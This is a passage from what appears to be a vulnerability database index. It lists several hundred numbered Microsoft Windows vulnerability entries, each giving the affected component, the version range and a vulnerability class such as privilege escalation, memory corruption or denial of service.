vulnerability [172902] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172901] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172900] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172899] Microsoft Windows 8.1 up to Server 2019 Remote Procedure Call Runtime Remote unknown vulnerability [172898] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172896] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172895] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172894] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172892] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172891] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172890] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172889] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172888] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172887] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172886] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172885] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172880] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP Driver denial of service [172877] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP information disclosure [172875] Microsoft Windows 8.1 up to Server 2019 Hyper-V unknown vulnerability [172874] Microsoft Windows 7 SP1 up to Server 2019 Network File System unknown vulnerability [171012] Microsoft Windows 10 20H2 up to Server 2019 NAT denial of service [171009] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V unknown vulnerability [171000] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170999] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170998] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170997] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170996] Microsoft Windows Server 20H2 up to Server 2019 DNS Server code injection [170995] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170994] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170990] Microsoft Windows Admin Center unknown vulnerability [170981] Microsoft Windows 7 SP1 up to Server 2019 Remote Access API privileges management [170979] Microsoft Windows 10 20H2 up to Server 2019 OpenType Font Parser code injection [170978] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [170907] Microsoft Windows 10 20H2 up to Server 2019 Application Virtualization code injection [170436] Microsoft Windows 8.1 up to Server 2019 Extended Protection for Authentication improper authentication [169530] Microsoft Windows 7 SP1 up to Server 2019 Trust Verification API denial of service [169529] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169528] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169527] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP denial of service [169526] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call information disclosure [169525] Microsoft Windows 7 SP1 up to Server 2019 Local Spooler unknown vulnerability [169524] Microsoft Windows 10 20H2 up to Server 2019 Microsoft.PowerShell.Utility Module protection mechanism [169521] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Network File System denial of service [169509] Microsoft Windows 7 SP1 up to Server 2019 Address Book unknown vulnerability [169502] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169501] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169499] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [169498] Microsoft Windows 10 up to Server 2019 unknown vulnerability [169497] Microsoft Windows 10 Version 1809 for 32-bit Systems Codecs Library unknown vulnerability [169487] Microsoft Windows 10 up to Server 2019 Graphics unknown vulnerability [167703] Microsoft Windows 7 SP1 up to Server 2019 Update Stack privileges management [167700] Microsoft Windows 10 up to Server 2019 RDP authorization [167699] Microsoft Windows 7 SP1 up to Server 2019 RDP Core unknown vulnerability [167687] Microsoft Windows 7 SP1 up to Server 2019 Graphics information disclosure [167686] Microsoft Windows 7 SP1 up to Server 2019 GDI+ information disclosure [167685] Microsoft Windows 7 SP1 up to Server 2019 Fax Compose Form privileges management [167680] Microsoft Windows 7 SP1 up to Server 2019 CryptoAPI denial of service [167664] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167663] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167662] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167661] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167660] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167659] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167658] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167657] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167656] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167655] Microsoft Windows 8.1 up to Server 2019 NTLM unknown vulnerability [167651] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [167638] Microsoft Windows 7 SP1 up to Server 2019 DTV-DVD Video Decoder unknown vulnerability [167637] Microsoft Windows 8.1/10/10 1607/Server 2012 R2/Server 2016 Hyper-V denial of service [167636] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V denial of service [167633] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [160963] Microsoft Windows up to Server 2019 Projected Filesystem privilege escalation [160951] Microsoft Windows up to Server 2019 Kernel memory corruption [160950] Microsoft OneDrive on Windows privilege escalation [160949] Microsoft OneDrive on Windows privilege escalation [160948] Microsoft OneDrive on Windows privilege escalation [160947] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [160946] Microsoft Windows up to Server 2019 TLS weak encryption [160944] Microsoft Windows up to Server 2019 Kernel Improper Initialization [160943] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [160942] Microsoft Windows up to Server 2019 Kernel information disclosure [160940] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160939] Microsoft Windows up to Server 2004 InstallService privilege escalation [160936] Microsoft Windows up to Server 2019 Microsoft COM for Windows privilege escalation [160932] Microsoft Windows up to Server 2019 CloudExperienceHost privilege escalation [160930] Microsoft Windows up to Server 2019 fdSSDP.dll privilege escalation [160925] Microsoft Windows up to Server 2019 DirectX privilege escalation [160924] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160923] Microsoft Windows up to Server 2019 GDI information disclosure [160922] Microsoft Windows up to Server 2019 Win32k information disclosure [160921] Microsoft Windows up to Server 2019 Win32k privilege escalation [160920] Microsoft Windows up to Server 2019 DNS denial of service [160912] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160911] Microsoft Windows up to Server 2004 StartTileData.dll privilege escalation [160910] Microsoft Windows up to Server 2019 Win32k.sys privilege escalation [160909] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160908] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160907] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160906] Microsoft Windows up to Server 2019 Language Pack Installer privilege escalation [160905] Microsoft Windows up to Server 2004 StartTileData.dll information disclosure [160904] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [160903] Microsoft Windows 10 2004 Shell Infrastructure privilege escalation [160902] Microsoft Windows up to Server 2019 GDI Dynamically-Managed Code Resources [160901] Microsoft Windows up to Server 2019 Graphics Component Dynamically-Managed Code Resources [160900] Microsoft Windows up to Server 2019 Graphics Component memory corruption [160899] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160898] Microsoft Windows up to Server 2019 DirectX privilege escalation [160895] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160894] Microsoft Windows up to Server 2019 Routing Utilities denial of service [160892] Microsoft Windows up to Server 2019 Kernel information disclosure [160891] Microsoft Windows up to Server 2019 DHCP Server information disclosure [160890] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [160889] Microsoft Windows up to Server 2019 Group Policy privilege escalation [160886] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [160883] Microsoft Windows up to Server 2019 Kernel information disclosure [160882] Microsoft Windows up to Server 2019 Graphics Component information disclosure [160881] Microsoft Windows up to Server 2019 State Repository Service information disclosure [160880] Microsoft Windows up to Server 2019 Function Discovery SSDP Provider privilege escalation [160879] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [160876] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160874] Microsoft Windows up to Server 2019 Shell Infrastructure memory corruption [160873] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160871] Microsoft Windows up to Server 2019 NTFS privilege escalation [160870] Microsoft Windows up to Server 2019 Active Directory Federation Service 2FA weak authentication [160869] Microsoft Windows up to Server 2019 DNS privilege escalation [160868] Microsoft Windows 10 2004/Server 2004 Projected Filesystem privilege escalation [160866] Microsoft Windows up to Server 2019 Cryptographic Catalog Service privilege escalation [160865] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160864] Microsoft Windows up to Server 2019 Active Directory integrated DNS privilege escalation [160863] Microsoft Windows up to Server 2019 Active Directory integrated DNS memory corruption [160862] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160861] Microsoft Windows up to Server 2019 RSoP Service Application privilege escalation [160855] Microsoft Windows up to Server 2019 Media Audio Decoder memory corruption [160853] Microsoft Windows up to Server 2019 Media Audio Decoder privilege escalation [160849] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160848] Microsoft Windows up to Server 2019 GDI+ memory corruption [160847] Microsoft Windows up to Server 2019 memory corruption [160843] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160841] Microsoft Windows up to Server 2019 Camera Codec Pack memory corruption [160840] Microsoft Windows up to Server 2019 Microsoft COM for Windows memory corruption [160839] Microsoft Windows up to Server 2019 Text Service Module memory corruption [159610] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159608] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159604] Microsoft Windows up to Server 2019 Storage Service privilege escalation [159601] Microsoft Windows up to Server 2019 Speech Shell privilege escalation [159600] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [159597] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159595] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159594] Microsoft Windows up to Server 2019 Windows Runtime memory corruption [159593] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159592] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159591] Microsoft Windows up to Server 2019 Work Folder Service memory corruption [159590] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159589] Microsoft Windows up to Server 2019 State Repository Service information disclosure [159588] Microsoft Windows up to Server 2019 CDP User memory corruption [159587] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159585] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [159584] Microsoft Windows up to Server 2019 WaasMedic Service information disclosure [159583] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159582] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [159581] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159580] Microsoft Windows Remote Desktop Gateway privilege escalation [159579] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159574] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159573] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159572] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159571] Microsoft Windows up to Server 2019 UPnP Device Host memory corruption [159570] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159568] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159567] Microsoft Windows up to Server 2019 GDI memory corruption [159566] Microsoft Windows up to Server 2019 Remote Access memory corruption [159564] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [159563] Microsoft Windows up to Server 2019 Custom Protocol Engine memory corruption [159562] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159561] Microsoft Windows up to Server 2019 Kernel information disclosure [159560] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159558] Microsoft Windows up to Server 2019 Kernel privilege escalation [159557] Microsoft Windows up to Server 2019 Font Driver Host memory corruption [159556] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159555] Microsoft Windows up to Server 2019 Backup Service privilege escalation [159554] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159553] Microsoft Windows up to Server 2019 Telephony Server privilege escalation [159552] Microsoft Windows up to Server 2019 CDP User memory corruption [159550] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159548] Microsoft Windows up to Server 2019 Backup Engine privilege escalation [159545] Microsoft Windows up to Server 2019 GDI privilege escalation [159543] Microsoft Windows up to Server 2019 Kernel memory corruption [159542] Microsoft Windows up to Server 2019 Hard Link privilege escalation [159541] Microsoft Windows up to Server 2019 Remote Access memory corruption [159540] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159539] Microsoft Windows up to Server 2019 Radio Manager API memory corruption [159537] Microsoft Windows up to Server 2019 Accounts Control memory corruption [159534] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159531] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159530] Microsoft Windows up to Server 2019 Media Foundation information disclosure [159529] Microsoft Windows up to Server 2019 Network Connection Broker privilege escalation [159528] Microsoft Windows up to Server 2019 Ancillary Function Driver for WinSock privilege escalation [159526] Microsoft Windows up to Server 2019 Public Account Pictures Folder privilege escalation [159524] Microsoft Windows up to Server 2019 Win32k information disclosure [159523] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159522] Microsoft Windows up to Server 2019 DirectWrite information disclosure [159521] Microsoft Windows up to Server 2019 SSDP Provider privilege escalation [159518] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159517] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159513] Microsoft Windows up to Server 2019 DirectX privilege escalation [159512] Microsoft Windows up to Server 2019 Kernel privilege escalation [159509] Microsoft Windows 10 1909/10 2004 Codecs Library memory corruption [159504] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159503] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159500] Microsoft Windows up to Server 2004 Codecs Library memory corruption [159499] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159497] Microsoft Windows up to Server 2019 Media Audio Codec memory corruption [159496] Microsoft Windows up to 10 2004 Codecs Library memory corruption [159495] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159494] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159433] Microsoft Windows net use weak authentication [159426] Microsoft Windows VCF Card privilege escalation [159425] Microsoft Windows Group File privilege escalation [158019] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157995] Microsoft Windows up to Server 2019 WalletService information disclosure [157993] Microsoft Windows up to Server 2019 WalletService privilege escalation [157991] Microsoft Windows up to Server 2019 Update Stack privilege escalation [157990] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [157989] Microsoft Windows up to Server 2019 Delivery Optimization Service privilege escalation [157988] Microsoft Windows 10 2004/Server 2004 Subsystem for Linux privilege escalation [157986] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157985] Microsoft Windows up to Server 2019 Profile Service privilege escalation [157984] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157983] Microsoft Windows up to Server 2019 Kernel privilege escalation [157981] Microsoft Windows up to Server 2019 Kernel information disclosure [157979] Microsoft Windows up to Server 2019 Resource Policy information disclosure [157978] Microsoft Windows up to Server 2019 Kernel information disclosure [157977] Microsoft Windows up to Server 2019 Kernel memory corruption [157975] Microsoft Windows up to Server 2019 ALPC privilege escalation [157973] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157972] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157971] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157970] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157969] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157968] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157963] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157960] Microsoft Windows up to Server 2019 Diagnostics Hub privilege escalation [157957] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [157956] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service information disclosure [157955] Microsoft Windows up to Server 2019 Agent Activation Runtime information disclosure [157952] Microsoft Windows up to Server 2019 USO Core Worker privilege escalation [157951] Microsoft Windows up to Server 2019 Storage Services privilege escalation [157950] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157949] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157948] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157946] Microsoft Windows up to Server 2019 lnk File privilege escalation [157945] Microsoft Windows up to Server 2019 Error Reporting information disclosure [157944] Microsoft Windows iSCSI Target Service privilege escalation [157943] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157942] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157941] Microsoft Windows up to Server 2019 Remote Desktop Client memory corruption [157939] Microsoft Windows up to Server 2019 Picker Platform privilege escalation [157938] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157937] Microsoft Windows up to Server 2019 Windows Print Workflow Service privilege escalation [157936] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157935] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157934] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [157933] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157930] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157925] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [157924] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157923] Microsoft Windows up to Server 2019 Network Connections Service privilege escalation [157922] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157921] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157920] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [157919] Microsoft Windows up to Server 2019 Mobile Device Management information disclosure [157918] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [157916] Microsoft Windows up to Server 2019 Windows Address Book privilege escalation [157913] Microsoft OneDrive on Windows privilege escalation [157895] Microsoft Windows Defender MpSigStub.exe privilege escalation [157894] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157893] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157892] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157889] Microsoft Windows up to Server 2019 Imaging information disclosure [157888] Microsoft Windows up to Server 2019 Graphics Origin Validation Error [157887] Microsoft Windows up to Server 2019 DirectWrite memory corruption [157886] Microsoft Windows up to Server 2019 Graphics Component memory corruption [157885] Microsoft Windows up to Server 2019 GDI+ memory corruption [157884] Microsoft Windows up to Server 2019 Font Library privilege escalation [157883] Microsoft Windows up to Server 2019 Graphics Component information disclosure [157882] Microsoft Windows up to Server 2019 GDI information disclosure [157881] Microsoft Windows up to Server 2004 Font Driver Host memory corruption [157509] Microsoft Windows up to Server 2019 Codecs Library memory corruption [157508] Microsoft Windows up to Server 2019 Codecs Library memory corruption [156422] Microsoft Windows 10 2004/Server 2004 SMBv3 denial of service [156421] Microsoft Windows up to Server 2004 SMBv3 information disclosure [156420] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [156419] Microsoft Windows up to Server 2019 LNK privilege escalation [156418] Microsoft Windows up to Server 2019 CAB File privilege escalation [156417] Microsoft Windows up to Server 2019 OLE Automation privilege escalation [156415] Microsoft Windows up to Server 2019 Media Foundation information disclosure [156414] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156413] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156412] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156410] Microsoft Windows up to Server 2004 Windows Runtime privilege escalation [156409] Microsoft Windows up to Server 2019 Kernel privilege escalation [156408] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156407] Microsoft Windows up to Server 2019 Kernel privilege escalation [156406] Microsoft Windows up to Server 2019 Kernel privilege escalation [156404] Microsoft Windows up to Server 2019 Kernel privilege escalation [156403] Microsoft Windows up to Server 2019 Kernel privilege escalation [156402] Microsoft Windows up to Server 2019 Win32k privilege escalation [156401] Microsoft Windows up to Server 2004 Kernel privilege escalation [156399] Microsoft Windows up to Server 2004 Kernel privilege escalation [156398] Microsoft Windows up to Server 2019 Win32k privilege escalation [156397] Microsoft Windows up to Server 2019 Kernel privilege escalation [156396] Microsoft Windows Windows Installer privilege escalation [156395] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156394] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156393] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156386] Microsoft Windows up to Server 2004 GDI+ memory corruption [156385] Microsoft Windows up to Server 2019 Windows Runtime information disclosure [156384] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156382] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [156381] Microsoft Windows up to Server 2004 Kernel privilege escalation [156380] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [156378] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156377] Microsoft Windows up to Server 2019 Registry privilege escalation [156376] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [156375] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [156374] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156373] Microsoft Windows up to Server 2019 Kernel privilege escalation [156372] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156371] Microsoft Windows up to Server 2019 Session Manager privilege escalation [156370] Microsoft Windows 10 2004/Server 2004 Connected User Experiences/Telemetry Service privilege escalation [156369] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156368] Microsoft Windows up to Server 2019 Backup Service privilege escalation [156367] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [156365] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service denial of service [156364] Microsoft Windows up to Server 2019 Group Policy privilege escalation [156363] Microsoft Windows up to Server 2019 OpenSSH privilege escalation [156361] Microsoft Windows up to Server 2019 Win32k information disclosure [156360] Microsoft Windows up to Server 2004 Windows Service information disclosure [156359] Microsoft Windows up to Server 2019 Host Guardian Service information disclosure [156358] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156356] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [156354] Microsoft Windows up to Server 2019 Diagnostics/Feedback Settings App information disclosure [156353] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156352] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156351] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156350] Microsoft Windows up to Server 2019 Kernel privilege escalation [156349] Microsoft Windows up to Server 2004 Update Orchestrator Service privilege escalation [156348] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [156347] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156346] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156321] Microsoft Windows Defender privilege escalation [156320] Microsoft Windows Defender privilege escalation [156319] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156318] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156317] Microsoft Windows up to Server 2019 GDI privilege escalation [156316] Microsoft Windows up to Server 2019 Kernel privilege escalation [156315] Microsoft Windows up to Server 2019 GDI information disclosure [156314] Microsoft Windows up to Server 2019 Win32k privilege escalation [156313] Microsoft Windows up to Server 2019 GDI privilege escalation [156312] Microsoft Windows up to Server 2019 Graphics Component information disclosure [156311] Microsoft Windows up to Server 2019 Win32k privilege escalation [156310] Microsoft Windows up to Server 2019 DirectX privilege escalation [156309] Microsoft Windows up to Server 2019 Win32k privilege escalation [156303] Microsoft Windows 10 1709/10 1803/10 1809/10 1903/Server 2004 Feedback Hub privilege escalation [156302] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156301] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156300] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [155176] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155175] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155174] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155173] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155172] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155171] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155170] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155169] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155168] Microsoft Windows up to Server 2019 GDI information disclosure [155167] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155166] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155165] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155162] Microsoft Windows Clipboard Service privilege escalation [155161] Microsoft Windows Clipboard Service privilege escalation [155160] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155158] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155157] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155156] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155155] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155154] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [155153] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155152] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Media Foundation memory corruption [155151] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155150] Microsoft Windows GDI information disclosure [155149] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155148] Microsoft Windows up to Server 2019 Win32k privilege escalation [155147] Microsoft Windows up to Server 2019 GDI privilege escalation [155146] Microsoft Windows up to Server 2019 GDI information disclosure [155145] Microsoft Windows up to Server 2019 DirectX privilege escalation [155144] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155143] Microsoft Windows up to Server 2019 Storage Service privilege escalation [155142] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [155141] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [155140] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155139] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [155138] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155137] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155136] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155135] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155134] Microsoft Windows up to Server 2019 Clipboard Service privilege escalation [155133] Microsoft Windows up to Server 2019 TLS denial of service [155132] Microsoft Windows up to Server 2019 CSRSS information disclosure [155131] Microsoft Windows up to Server 2019 Kernel privilege escalation [155130] Microsoft Windows up to Server 2019 Task Scheduler weak authentication [155129] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [155127] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155126] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155115] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155114] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155112] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155111] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155110] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155109] Microsoft Windows up to Server 2019 Printer Service privilege escalation [155108] Microsoft Windows up to Server 2019 privilege escalation [155107] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [155106] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155105] Microsoft Windows up to Server 2019 memory corruption [155104] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [155103] Microsoft Windows up to Server 2019 information disclosure [155100] Microsoft Windows up to Server 2019 Media Service privilege escalation [155096] Microsoft Windows up to Server 2019 Script Runtime memory corruption [155092] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [155091] Microsoft Windows up to Server 2019 Win32k privilege escalation [155090] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155089] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [155087] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155086] Microsoft Windows up to Server 2019 Block Level Backup Engine Service privilege escalation [155084] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [155080] Microsoft Windows up to Server 2019 Graphics Component memory corruption [155079] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155078] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155077] Microsoft Windows up to Server 2019 Color Management ICM32.dll memory corruption [155072] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153289] Microsoft Windows up to Server 2019 Work Folder Service 